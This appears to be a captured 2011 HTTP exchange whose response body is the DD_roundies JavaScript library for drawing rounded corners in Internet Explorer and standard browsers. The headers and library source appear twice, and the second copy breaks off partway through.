User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:
/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/
var DD_roundies = {
ns: 'DD_roundies',
IE6: false,
IE7: false,
IE8: false,
IEversion: function() {
if (document.documentMode != 8 && document.namespaces && !document.namespaces[this.ns]) {
this.IE6 = true;
this.IE7 = true;
}
else if (document.documentMode == 8) {
this.IE8 = true;
}
},
querySelector: document.querySelectorAll,
selectorsToProcess: [],
imgSize: {},
createVmlNameSpace: function() { /* enable VML */
if (this.IE6 || this.IE7) {
document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml');
}
if (this.IE8) {
document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');
}
},
createVmlStyleSheet: function() { /* style VML, enable behaviors */
/*
Just in case lots of other developers have added
lots of other stylesheets using document.createStyleSheet
and hit the 31-limit mark, let's not use that method!
further reading: http://msdn.microsoft.com/en-us/library/ms531194(VS.85).aspx
*/
var style = document.createElement('style');
document.documentElement.firstChild.insertBefore(style, document.documentElement.firstChild.firstChild);
if (style.styleSheet) { /* IE */
try {
var styleSheet = style.styleSheet;
styleSheet.addRule(this.ns + '\\:*', '{behavior:url(#default#VML)}');
this.styleSheet = styleSheet;
} catch(err) {}
}
else {
this.styleSheet = style;
}
},
/**
* Method to use from afar - refer to it whenever.
* Example for IE only: DD_roundies.addRule('div.boxy_box', '10px 5px');
* Example for IE, Firefox, and WebKit: DD_roundies.addRule('div.boxy_box', '10px 5px', true);
* @param {String} selector - REQUIRED - a CSS selector, such as '#doc .container'
* @param {Integer} radius - REQUIRED - the desired radius for the box corners
* @param {Boolean} standards - OPTIONAL - true if you also wish to output -moz-border-radius/-webkit-border-radius/border-radius declarations
**/
addRule: function(selector, rad, standards) {
if (typeof rad == 'undefined' || rad === null) {
rad = 0;
}
if (rad.constructor.toString().search('Array') == -1) {
rad = rad.toString().replace(/[^0-9 ]/g, '').split(' ');
}
for (var i=0; i<4; i++) {
rad[i] = (!rad[i] && rad[i] !== 0) ? rad[Math.max((i-2), 0)] : rad[i];
}
if (this.styleSheet) {
if (this.styleSheet.addRule) { /* IE */
var selectors = selector.split(','); /* multiple selectors supported, no need for multiple calls to this anymore */
for (var i=0; i<selectors.length; i++) {
this.styleSheet.addRule(selectors[i], 'behavior:expression(DD_roundies.roundify.call(this, [' + rad.join(',') + ']))'); /* seems to execute the function without adding it to the stylesheet - interesting... */
}
}
else if (standards) {
var moz_implementation = rad.join('px ') + 'px';
this.styleSheet.appendChild(document.createTextNode(selector + ' {border-radius:' + moz_implementation + '; -moz-border-radius:' + moz_implementation + ';}'));
this.styleSheet.appendChild(document.createTextNode(selector + ' {-webkit-border-top-left-radius:' + rad[0] + 'px ' + rad[0] + 'px; -webkit-border-top-right-radius:' + rad[1] + 'px ' + rad[1] + 'px; -webkit-border-bottom-right-radius:' + rad[2] + 'px ' + rad[2] + 'px; -webkit-border-bottom-left-radius:' + rad[3] + 'px ' + rad[3] + 'px;}'));
}
}
else if (this.IE8) {
this.selectorsToProcess.push({'selector':selector, 'radii':rad});
}
},
readPropertyChanges: function(el) {
switch (event.propertyName) {
case 'style.border':
case 'style.borderWidth':
case 'style.padding':
this.applyVML(el);
break;
case 'style.borderColor':
this.vmlStrokeColor(el);
break;
case 'style.backgroundColor':
case 'style.backgroundPosition':
case 'style.backgroundRepeat':
this.applyVML(el);
break;
case 'style.display':
el.vmlBox.style.display = (el.style.display == 'none') ? 'none' : 'block';
break;
case 'style.filter':
this.vmlOpacity(el);
break;
case 'style.zIndex':
el.vmlBox.style.zIndex = el.style.zIndex;
break;
}
},
applyVML: function(el) {
el.runtimeStyle.cssText = '';
this.vmlFill(el);
this.vmlStrokeColor(el);
this.vmlStrokeWeight(el);
this.vmlOffsets(el);
this.vmlPath(el);
this.nixBorder(el);
this.vmlOpacity(el);
},
vmlOpacity: function(el) {
if (el.currentStyle.filter.search('lpha') != -1) {
var trans = el.currentStyle.filter;
trans = parseInt(trans.substring(trans.lastIndexOf('=')+1, trans.lastIndexOf(')')), 10)/100;
for (var v in el.vml) {
el.vml[v].filler.opacity = trans;
}
}
},
vmlFill: function(el) {
if (!el.currentStyle) {
return;
} else {
var elStyle = el.currentStyle;
}
el.runtimeStyle.backgroundColor = '';
el.runtimeStyle.backgroundImage = '';
var noColor = (elStyle.backgroundColor == 'transparent');
var noImg = true;
if (elStyle.backgroundImage != 'none' || el.isImg) {
if (!el.isImg) {
el.vmlBg = elStyle.backgroundImage;
el.vmlBg = el.vmlBg.substr(5, el.vmlBg.lastIndexOf('")')-5);
}
else {
el.vmlBg = el.src;
}
var lib = this;
if (!lib.imgSize[el.vmlBg]) { /* determine size of loaded image */
var img = document.createElement('img');
img.attachEvent('onload', function() {
this.width = this.offsetWidth; /* weird cache-busting requirement! */
this.height = this.offsetHeight;
lib.vmlOffsets(el);
});
img.className = lib.ns + '_sizeFinder';
img.runtimeStyle.cssText = 'behavior:none; position:absolute; top:-10000px; left:-10000px; border:none;'; /* make sure to set behavior to none to prevent accidental matching of the helper elements! */
img.src = el.vmlBg;
img.removeAttribute('width');
img.removeAttribute('height');
document.body.insertBefore(img, document.body.firstChild);
lib.imgSize[el.vmlBg] = img;
}
el.vml.image.filler.src = el.vmlBg;
noImg = false;
}
el.vml.image.filled = !noImg;
el.vml.image.fillcolor = 'none';
el.vml.color.filled = !noColor;
el.vml.color.fillcolor = elStyle.backgroundColor;
el.runtimeStyle.backgroundImage = 'none';
el.runtimeStyle.backgroundColor = 'transparent';
},
vmlStrokeColor: function(el) {
el.vml.stroke.fillcolor = el.currentStyle.borderColor;
},
vmlStrokeWeight: function(el) {
var borders = ['Top', 'Right', 'Bottom', 'Left'];
el.bW = {};
for (var b=0; b<4; b++) {
el.bW[borders[b]] = parseInt(el.currentStyle['border' + borders[b] + 'Width'], 10) || 0;
}
},
vmlOffsets: function(el) {
var dims = ['Left', 'Top', 'Width', 'Height'];
for (var d=0; d<4; d++) {
el.dim[dims[d]] = el['offset'+dims[d]];
}
var assign = function(obj, topLeft) {
obj.style.left = (topLeft ? 0 : el.dim.Left) + 'px';
obj.style.top = (topLeft ? 0 : el.dim.Top) + 'px';
obj.style.width = el.dim.Width + 'px';
obj.style.height = el.dim.Height + 'px';
};
for (var v in el.vml) {
var mult = (v == 'image') ? 1 : 2;
el.vml[v].coordsize = (el.dim.Width*mult) + ', ' + (el.dim.Height*mult);
assign(el.vml[v], true);
}
assign(el.vmlBox, false);
if (DD_roundies.IE8) {
el.vml.stroke.style.margin = '-1px';
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
el.vml.color.style.margin = (el.bW.Top-1) + 'px ' + (el.bW.Left-1) + 'px';
}
},
vmlPath: function(el) {
var coords = function(direction, w, h, r, aL, aT, mult) {
var cmd = direction ? ['m', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'qx', 'l'] : ['qx', 'l', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'm']; /* whoa */
aL *= mult;
aT *= mult;
w *= mult;
h *= mult;
var R = r.slice(); /* do not affect original array */
for (var i=0; i<4; i++) {
R[i] *= mult;
R[i] = Math.min(w/2, h/2, R[i]); /* make sure you do not get funky shapes - pick the smallest: half of the width, half of the height, or current value */
}
var coords = [
cmd[0] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT),
cmd[1] + Math.floor(R[0]+aL) +','+ Math.floor(0+aT),
cmd[2] + Math.ceil(w-R[1]+aL) +','+ Math.floor(0+aT),
cmd[3] + Math.ceil(w+aL) +','+ Math.floor(R[1]+aT),
cmd[4] + Math.ceil(w+aL) +','+ Math.ceil(h-R[2]+aT),
cmd[5] + Math.ceil(w-R[2]+aL) +','+ Math.ceil(h+aT),
cmd[6] + Math.floor(R[3]+aL) +','+ Math.ceil(h+aT),
cmd[7] + Math.floor(0+aL) +','+ Math.ceil(h-R[3]+aT),
cmd[8] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT)
];
if (!direction) {
coords.reverse();
}
var path = coords.join('');
return path;
};
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
var bW = el.bW;
var rad = el.DD_radii.slice();
/* determine outer curves */
var outer = coords(true, el.dim.Width, el.dim.Height, rad, 0, 0, 2);
/* determine inner curves */
rad[0] -= Math.max(bW.Left, bW.Top);
rad[1] -= Math.max(bW.Top, bW.Right);
rad[2] -= Math.max(bW.Right, bW.Bottom);
rad[3] -= Math.max(bW.Bottom, bW.Left);
for (var i=0; i<4; i++) {
rad[i] = Math.max(rad[i], 0);
}
var inner = coords(false, el.dim.Width-bW.Left-bW.Right, el.dim.Height-bW.Top-bW.Bottom, rad, bW.Left, bW.Top, 2);
var image = coords(true, el.dim.Width-bW.Left-bW.Right+1, el.dim.Height-bW.Top-bW.Bottom+1, rad, bW.Left, bW.Top, 1);
/* apply huge path string */
el.vml.color.path = inner;
el.vml.image.path = image;
el.vml.stroke.path = outer + inner;
this.clipImage(el);
},
nixBorder: function(el) {
var s = el.currentStyle;
var sides = ['Top', 'Left', 'Right', 'Bottom'];
for (var i=0; i<4; i++) {
el.runtimeStyle['padding' + sides[i]] = (parseInt(s['padding' + sides[i]], 10) || 0) + (parseInt(s['border' + sides[i] + 'Width'], 10) || 0) + 'px';
}
el.runtimeStyle.border = 'none';
},
clipImage: function(el) {
var lib = DD_roundies;
if (!el.vmlBg || !lib.imgSize[el.vmlBg]) {
return;
}
var thisStyle = el.currentStyle;
var bg = {'X':0, 'Y':0};
var figurePercentage = function(axis, position) {
var fraction = true;
switch(position) {
case 'left':
case 'top':
bg[axis] = 0;
break;
case 'center':
bg[axis] = 0.5;
break;
case 'right':
case 'bottom':
bg[axis] = 1;
break;
default:
if (position.search('%') != -1) {
bg[axis] = parseInt(position, 10) * 0.01;
}
else {
fraction = false;
}
}
var horz = (axis == 'X');
bg[axis] = Math.ceil(fraction ? (( el.dim[horz ? 'Width' : 'Height'] - (el.bW[horz ? 'Left' : 'Top'] + el.bW[horz ? 'Right' : 'Bottom']) ) * bg[axis]) - (lib.imgSize[el.vmlBg][horz ? 'width' : 'height'] * bg[axis]) : parseInt(position, 10));
bg[axis] += 1;
};
for (var b in bg) {
figurePercentage(b, thisStyle['backgroundPosition'+b]);
}
el.vml.image.filler.position = (bg.X/(el.dim.Width-el.bW.Left-el.bW.Right+1)) + ',' + (bg.Y/(el.dim.Height-el.bW.Top-el.bW.Bottom+1));
var bgR = thisStyle.backgroundRepeat;
var c = {'T':1, 'R':el.dim.Width+1, 'B':el.dim.Height+1, 'L':1}; /* these are defaults for repeat of any kind */
var altC = { 'X': {'b1': 'L', 'b2': 'R', 'd': 'Width'}, 'Y': {'b1': 'T', 'b2': 'B', 'd': 'Height'} };
if (bgR != 'repeat') {
c = {'T':(bg.Y), 'R':(bg.X+lib.imgSize[el.vmlBg].width), 'B':(bg.Y+lib.imgSize[el.vmlBg].height), 'L':(bg.X)}; /* these are defaults for no-repeat - clips down to the image location */
if (bgR.search('repeat-') != -1) { /* now let's revert to dC for repeat-x or repeat-y */
var v = bgR.split('repeat-')[1].toUpperCase();
c[altC[v].b1] = 1;
c[altC[v].b2] = el.dim[altC[v].d]+1;
}
if (c.B > el.dim.Height) {
c.B = el.dim.Height+1;
}
}
el.vml.image.style.clip = 'rect('+c.T+'px '+c.R+'px '+c.B+'px '+c.L+'px)';
},
pseudoClass: function(el) {
var self = this;
setTimeout(function() { /* would not work as intended without setTimeout */
self.applyVML(el);
}, 1);
},
reposition: function(el) {
this.vmlOffsets(el);
this.vmlPath(el);
},
roundify: function(rad) {
this.style.behavior = 'none';
if (!this.currentStyle) {
return;
}
else {
var thisStyle = this.currentStyle;
}
var allowed = {BODY: false, TABLE: false, TR: false, TD: false, SELECT: false, OPTION: false, TEXTAREA: false};
if (allowed[this.nodeName] === false) { /* elements not supported yet */
return;
}
var self = this; /* who knows when you might need a setTimeout */
var lib = DD_roundies;
this.DD_radii = rad;
this.dim = {};
/* attach handlers */
var handlers = {resize: 'reposition', move: 'reposition'};
if (this.nodeName == 'A') {
var moreForAs = {mouseleave: 'pseudoClass', mouseenter: 'pseudoClass', focus: 'pseudoClass', blur: 'pseudoClass'};
for (var a in moreForAs) {
handlers[a] = moreForAs[a];
}
}
for (var h in handlers) {
this.attachEvent('on' + h, function() {
lib[handlers[h]](self);
});
}
this.attachEvent('onpropertychange', function() {
lib.readPropertyChanges(self);
});
/* ensure that this elent and its parent is given hasLayout (needed for accurate positioning) */
var giveLayout = function(el) {
el.style.zoom = 1;
if (el.currentStyle.position == 'static') {
el.style.position = 'relative';
}
};
giveLayout(this.offsetParent);
giveLayout(this);
/* create vml elements */
this.vmlBox = document.createElement('ignore'); /* IE8 really wants to be encased in a wrapper element for the VML to work, and I don't want to disturb getElementsByTagName('div') - open to suggestion on how to do this differently */
this.vmlBox.runtimeStyle.cssText = 'behavior:none; position:absolute; margin:0; padding:0; border:0; background:none;'; /* super important - if something accidentally matches this (you yourseld did this once, Drew), you'll get infinitely-created elements and a frozen browser! */
this.vmlBox.style.zIndex = thisStyle.zIndex;
this.vml = {'color':true, 'image':true, 'stroke':true};
for (var v in this.vml) {
this.vml[v] = document.createElement(lib.ns + ':shape');
this.vml[v].filler = document.createElement(lib.ns + ':fill');
this.vml[v].appendChild(this.vml[v].filler);
this.vml[v].stroked = false;
this.vml[v].style.position = 'absolute';
this.vml[v].style.zIndex = thisStyle.zIndex;
this.vml[v].coordorigin = '1,1';
this.vmlBox.appendChild(this.vml[v]);
}
this.vml.image.fillcolor = 'none';
this.vml.image.filler.type = 'tile';
this.parentNode.insertBefore(this.vmlBox, this);
this.isImg = false;
if (this.nodeName == 'IMG') {
this.isImg = true;
this.style.visibility = 'hidden';
}
setTimeout(function() {
lib.applyVML(self);
}, 1);
}
};
try {
document.execCommand("BackgroundImageCache", false, true);
} catch(err) {}
DD_roundies.IEversion();
DD_roundies.createVmlNameSpace();
DD_roundies.createVmlStyleSheet();
if (DD_roundies.IE8 && document.attachEvent && DD_roundies.querySelector) {
document.attachEvent('onreadystatechange', function() {
if (document.readyState == 'complete') {
var selectors = DD_roundies.selectorsToProcess;
var length = selectors.length;
var delayedCall = function(node, radii, index) {
setTimeout(function() {
DD_roundies.roundify.call(node, radii);
}, index*100);
};
for (var i=0; i<length; i++) {
var results = document.querySelectorAll(selectors[i].selector);
var rLength = results.length;
for (var r=0; r<rLength; r++) {
if (results[r].nodeName != 'INPUT') { /* IE8 doesn't like to do this to inputs yet */
delayedCall(results[r], selectors[i].radii, r);
}
}
}
}
});
}
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:
/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/
var DD_roundies = {
ns: 'DD_roundies',
IE6: false,
IE7: false,
IE8: false,
IEversion: function() {
if (document.documentMode != 8 && document.namespaces && !document.namespaces[this.ns]) {
this.IE6 = true;
this.IE7 = true;
}
else if (document.documentMode == 8) {
this.IE8 = true;
}
},
querySelector: document.querySelectorAll,
selectorsToProcess: [],
imgSize: {},
createVmlNameSpace: function() { /* enable VML */
if (this.IE6 || this.IE7) {
document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml');
}
if (this.IE8) {
document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');
}
},
createVmlStyleSheet: function() { /* style VML, enable behaviors */
/*
Just in case lots of other developers have added
lots of other stylesheets using document.createStyleSheet
and hit the 31-limit mark, let's not use that method!
further reading: http://msdn.microsoft.com/en-us/library/ms531194(VS.85).aspx
*/
var style = document.createElement('style');
document.documentElement.firstChild.insertBefore(style, document.documentElement.firstChild.firstChild);
if (style.styleSheet) { /* IE */
try {
var styleSheet = style.styleSheet;
styleSheet.addRule(this.ns + '\\:*', '{behavior:url(#default#VML)}');
this.styleSheet = styleSheet;
} catch(err) {}
}
else {
this.styleSheet = style;
}
},
/**
* Method to use from afar - refer to it whenever.
* Example for IE only: DD_roundies.addRule('div.boxy_box', '10px 5px');
* Example for IE, Firefox, and WebKit: DD_roundies.addRule('div.boxy_box', '10px 5px', true);
* @param {String} selector - REQUIRED - a CSS selector, such as '#doc .container'
* @param {Integer} radius - REQUIRED - the desired radius for the box corners
* @param {Boolean} standards - OPTIONAL - true if you also wish to output -moz-border-radius/-webkit-border-radius/border-radius declarations
**/
addRule: function(selector, rad, standards) {
if (typeof rad == 'undefined' || rad === null) {
rad = 0;
}
if (rad.constructor.toString().search('Array') == -1) {
rad = rad.toString().replace(/[^0-9 ]/g, '').split(' ');
}
for (var i=0; i<4; i++) {
rad[i] = (!rad[i] && rad[i] !== 0) ? rad[Math.max((i-2), 0)] : rad[i];
}
if (this.styleSheet) {
if (this.styleSheet.addRule) { /* IE */
var selectors = selector.split(','); /* multiple selectors supported, no need for multiple calls to this anymore */
for (var i=0; i<selectors.length; i++) {
this.styleSheet.addRule(selectors[i], 'behavior:expression(DD_roundies.roundify.call(this, [' + rad.join(',') + ']))'); /* seems to execute the function without adding it to the stylesheet - interesting... */
}
}
else if (standards) {
var moz_implementation = rad.join('px ') + 'px';
this.styleSheet.appendChild(document.createTextNode(selector + ' {border-radius:' + moz_implementation + '; -moz-border-radius:' + moz_implementation + ';}'));
this.styleSheet.appendChild(document.createTextNode(selector + ' {-webkit-border-top-left-radius:' + rad[0] + 'px ' + rad[0] + 'px; -webkit-border-top-right-radius:' + rad[1] + 'px ' + rad[1] + 'px; -webkit-border-bottom-right-radius:' + rad[2] + 'px ' + rad[2] + 'px; -webkit-border-bottom-left-radius:' + rad[3] + 'px ' + rad[3] + 'px;}'));
}
}
else if (this.IE8) {
this.selectorsToProcess.push({'selector':selector, 'radii':rad});
}
},
readPropertyChanges: function(el) {
switch (event.propertyName) {
case 'style.border':
case 'style.borderWidth':
case 'style.padding':
this.applyVML(el);
break;
case 'style.borderColor':
this.vmlStrokeColor(el);
break;
case 'style.backgroundColor':
case 'style.backgroundPosition':
case 'style.backgroundRepeat':
this.applyVML(el);
break;
case 'style.display':
el.vmlBox.style.display = (el.style.display == 'none') ? 'none' : 'block';
break;
case 'style.filter':
this.vmlOpacity(el);
break;
case 'style.zIndex':
el.vmlBox.style.zIndex = el.style.zIndex;
break;
}
},
applyVML: function(el) {
el.runtimeStyle.cssText = '';
this.vmlFill(el);
this.vmlStrokeColor(el);
this.vmlStrokeWeight(el);
this.vmlOffsets(el);
this.vmlPath(el);
this.nixBorder(el);
this.vmlOpacity(el);
},
vmlOpacity: function(el) {
if (el.currentStyle.filter.search('lpha') != -1) {
var trans = el.currentStyle.filter;
trans = parseInt(trans.substring(trans.lastIndexOf('=')+1, trans.lastIndexOf(')')), 10)/100;
for (var v in el.vml) {
el.vml[v].filler.opacity = trans;
}
}
},
vmlFill: function(el) {
if (!el.currentStyle) {
return;
} else {
var elStyle = el.currentStyle;
}
el.runtimeStyle.backgroundColor = '';
el.runtimeStyle.backgroundImage = '';
var noColor = (elStyle.backgroundColor == 'transparent');
var noImg = true;
if (elStyle.backgroundImage != 'none' || el.isImg) {
if (!el.isImg) {
el.vmlBg = elStyle.backgroundImage;
el.vmlBg = el.vmlBg.substr(5, el.vmlBg.lastIndexOf('")')-5);
}
else {
el.vmlBg = el.src;
}
var lib = this;
if (!lib.imgSize[el.vmlBg]) { /* determine size of loaded image */
var img = document.createElement('img');
img.attachEvent('onload', function() {
this.width = this.offsetWidth; /* weird cache-busting requirement! */
this.height = this.offsetHeight;
lib.vmlOffsets(el);
});
img.className = lib.ns + '_sizeFinder';
img.runtimeStyle.cssText = 'behavior:none; position:absolute; top:-10000px; left:-10000px; border:none;'; /* make sure to set behavior to none to prevent accidental matching of the helper elements! */
img.src = el.vmlBg;
img.removeAttribute('width');
img.removeAttribute('height');
document.body.insertBefore(img, document.body.firstChild);
lib.imgSize[el.vmlBg] = img;
}
el.vml.image.filler.src = el.vmlBg;
noImg = false;
}
el.vml.image.filled = !noImg;
el.vml.image.fillcolor = 'none';
el.vml.color.filled = !noColor;
el.vml.color.fillcolor = elStyle.backgroundColor;
el.runtimeStyle.backgroundImage = 'none';
el.runtimeStyle.backgroundColor = 'transparent';
},
vmlStrokeColor: function(el) {
el.vml.stroke.fillcolor = el.currentStyle.borderColor;
},
vmlStrokeWeight: function(el) {
var borders = ['Top', 'Right', 'Bottom', 'Left'];
el.bW = {};
for (var b=0; b<4; b++) {
el.bW[borders[b]] = parseInt(el.currentStyle['border' + borders[b] + 'Width'], 10) || 0;
}
},
vmlOffsets: function(el) {
var dims = ['Left', 'Top', 'Width', 'Height'];
for (var d=0; d<4; d++) {
el.dim[dims[d]] = el['offset'+dims[d]];
}
var assign = function(obj, topLeft) {
obj.style.left = (topLeft ? 0 : el.dim.Left) + 'px';
obj.style.top = (topLeft ? 0 : el.dim.Top) + 'px';
obj.style.width = el.dim.Width + 'px';
obj.style.height = el.dim.Height + 'px';
};
for (var v in el.vml) {
var mult = (v == 'image') ? 1 : 2;
el.vml[v].coordsize = (el.dim.Width*mult) + ', ' + (el.dim.Height*mult);
assign(el.vml[v], true);
}
assign(el.vmlBox, false);
if (DD_roundies.IE8) {
el.vml.stroke.style.margin = '-1px';
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
el.vml.color.style.margin = (el.bW.Top-1) + 'px ' + (el.bW.Left-1) + 'px';
}
},
vmlPath: function(el) {
var coords = function(direction, w, h, r, aL, aT, mult) {
var cmd = direction ? ['m', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'qx', 'l'] : ['qx', 'l', 'qy', 'l', 'qx', 'l', 'qy', 'l', 'm']; /* whoa */
aL *= mult;
aT *= mult;
w *= mult;
h *= mult;
var R = r.slice(); /* do not affect original array */
for (var i=0; i<4; i++) {
R[i] *= mult;
R[i] = Math.min(w/2, h/2, R[i]); /* make sure you do not get funky shapes - pick the smallest: half of the width, half of the height, or current value */
}
var coords = [
cmd[0] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT),
cmd[1] + Math.floor(R[0]+aL) +','+ Math.floor(0+aT),
cmd[2] + Math.ceil(w-R[1]+aL) +','+ Math.floor(0+aT),
cmd[3] + Math.ceil(w+aL) +','+ Math.floor(R[1]+aT),
cmd[4] + Math.ceil(w+aL) +','+ Math.ceil(h-R[2]+aT),
cmd[5] + Math.ceil(w-R[2]+aL) +','+ Math.ceil(h+aT),
cmd[6] + Math.floor(R[3]+aL) +','+ Math.ceil(h+aT),
cmd[7] + Math.floor(0+aL) +','+ Math.ceil(h-R[3]+aT),
cmd[8] + Math.floor(0+aL) +','+ Math.floor(R[0]+aT)
];
if (!direction) {
coords.reverse();
}
var path = coords.join('');
return path;
};
if (typeof el.bW == 'undefined') {
this.vmlStrokeWeight(el);
}
var bW = el.bW;
var rad = el.DD_radii.slice();
/* determine outer curves */
var outer = coords(true, el.dim.Width, el.dim.Height, rad, 0, 0, 2);
/* determine inner curves */
rad[0] -= Math.max(bW.Left, bW.Top);
rad[1] -= Math.max(bW.Top, bW.Right);
rad[2] -= Math.max(bW.Right, bW.Bottom);
rad[3] -= Math.max(bW.Bottom, bW.Left);
for (var i=0; i<4; i++) {
rad[i] = Math.max(rad[i], 0);
}
var inner = coords(false, el.dim.Width-bW.Left-bW.Right, el.dim.Height-bW.Top-bW.Bottom, rad, bW.Left, bW.Top, 2);
var image = coords(true, el.dim.Width-bW.Left-bW.Right+1, el.dim.Height-bW.Top-bW.Bottom+1, rad, bW.Left, bW.Top, 1);
/* apply huge path string */
el.vml.color.path = inner;
el.vml.image.path = image;
el.vml.stroke.path = outer + inner;
this.clipImage(el);
},
nixBorder: function(el) {
var s = el.currentStyle;
var sides = ['Top', 'Left', 'Right', 'Bottom'];
for (var i=0; i<4; i++) {
el.runtimeStyle['padding' + sides[i]] = (parseInt(s['padding' + sides[i]], 10) || 0) + (parseInt(s['border' + sides[i] + 'Width'], 10) || 0) + 'px';
}
el.runtimeStyle.border = 'none';
},
clipImage: function(el) {
var lib = DD_roundies;
if (!el.vmlBg || !lib.imgSize[el.vmlBg]) {
return;
}
var thisStyle = el.currentStyle;
var bg = {'X':0, 'Y':0};
var figurePercentage = function(axis, position) {
var fraction = true;
switch(position) {
case 'left':
case 'top':
bg[axis] = 0;
break;
case 'center':
bg[axis] = 0.5;
break;
case 'right':
case 'bottom':
bg[axis] = 1;
break;
default:
if (position.search('%') != -1) {
bg[axis] = parseInt(position, 10) * 0.01;
}
else {
fraction = false;
}
}
var horz = (axis == 'X');
bg[axis] = Math.ceil(fraction ? (( el.dim[horz ? 'Width' : 'Height'] - (el.bW[horz ? 'Left' : 'Top'] + el.bW[horz ? 'Right' : 'Bottom']) ) * bg[axis]) - (lib.imgSize[el.vmlBg][horz ? 'width' : 'height'] * bg[axis]) : parseInt(position, 10));
bg[axis] += 1;
};
for (var b in bg) {
figurePercentage(b, thisStyle['backgroundPosition'+b]);
}
el.vml.image.filler.position = (bg.X/(el.dim.Width-el.bW.Left-el.bW.Right+1)) + ',' + (bg.Y/(el.dim.Height-el.bW.Top-el.bW.Bottom+1));
var bgR = thisStyle.backgroundRepeat;
var c = {'T':1, 'R':el.dim.Width+1, 'B':el.dim.Height+1, 'L':1}; /* these are defaults for repeat of any kind */
var altC = { 'X': {'b1': 'L', 'b2': 'R', 'd': 'Width'}, 'Y': {'b1': 'T', 'b2': 'B', 'd': 'Height'} };
if (bgR != 'repeat') {
c = {'T':(bg.Y), 'R':(bg.X+lib.imgSize[el.vmlBg].width), 'B':(bg.Y+lib.imgSize[el.vmlBg].height), 'L':(bg.X)}; /* these are defaults for no-repeat - clips down to the image location */
if (bgR.search('repeat-') != -1) { /* now let's revert to dC for repeat-x or repeat-y */
var v = bgR.split('repeat-')[1].toUpperCase();
c[altC[v].b1] = 1;
c[altC[v].b2] = el.dim[altC[v].d]+1;
}
if (c.B > el.dim.Height) {
c.B = el.dim.Height+1;
}
}
el.vml.image.style.clip = 'rect('+c.T+'px '+c.R+'px '+c.B+'px '+c.L+'px)';
},
pseudoClass: function(el) {
var self = this;
setTimeout(function() { /* would not work as intended without setTimeout */
self.applyVML(el);
}, 1);
},
reposition: function(el) {
this.vmlOffsets(el);
this.vmlPath(el);
},
roundify: function(rad) {
this.style.behavior = 'none';
if (!this.currentStyle) {
return;
}
else {
var thisStyle = this.currentStyle;
}
var allowed = {BODY: false, TABLE: false, TR: false, TD: false, SELECT: false, OPTION: false, TEXTAREA: false};
if (allowed[this.nodeName] === false) { /* elements not supported yet */
return;
}
var self = this; /* who knows when you might need a setTimeout */
var lib = DD_roundies;
this.DD_radii = rad;
this.dim = {};
/* attach handlers */
var handlers = {resize: 'reposition', move: 'reposition'};
if (this.nodeName == 'A') {
var moreForAs = {mouseleave: 'pseudoClass', mouseenter: 'pseudoClass', focus: 'pseudoClass', blur: 'pseudoClass'};
for (var a in moreForAs) {
handlers[a] = moreForAs[a];
}
}
for (var h in handlers) {
this.attachEvent('on' + h, function() {
lib[handlers[h]](self);
});
}
this.attachEvent('onpropertychange', function() {
lib.readPropertyChanges(self);
});
/* ensure that this elent and its parent is given hasLayout (needed for accurate positioning) */
var giveLayout = function(el) {
el.style.zoom = 1;
if (el.currentStyle.position == 'static') {
el.style.position = 'relative';
}
};
giveLayout(this.offsetParent);
giveLayout(this);
/* create vml elements */
this.vmlBox = document.createElement('ignore'); /* IE8 really wants to be encased in a wrapper element for the VML to work, and I don't want to disturb getElementsByTagName('div') - open to suggestion on how to do this differently */
